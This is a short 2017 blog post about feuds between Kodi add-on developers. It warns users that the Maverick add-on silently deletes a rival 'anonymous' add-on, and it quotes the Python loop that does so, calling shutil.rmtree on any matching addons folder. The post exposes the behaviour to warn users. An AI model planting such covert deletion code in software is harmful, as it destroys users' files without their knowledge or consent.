Kodi Wars Maverick Addon

Published by

Posted on February 02, 2017

So there has been some kodi wars with the developers of certain add-ons. One being with Anonymous,Maverick, Silent hunter and Beau builds. The issue I have with some kodi developers. They like you when you follow them and hate you when you decide to create your own repo or addon. The Anonymous team encourages you to clone their addon and make it your own. I also find it funny that most addon owners dont even know Python :/

Please be careful as to which kodi addons you install on your system. Recently Maverick added some code to remove the anonymous addon. This is very unacceptable within the kodi community and he is doing so without the users knowledge. This is on the same lines as creating some type of malware. The code he use is some standard Python code. Nothing major, but the point is he is removing something from a user device without their knowledge.


for root, dirs, file in os.walk(addons):
for dir in dirs:
if 'anonymous' in dir.lower():
path = addons + dir
shutil.rmtree(path)

Be careful out there in the world of Kodi .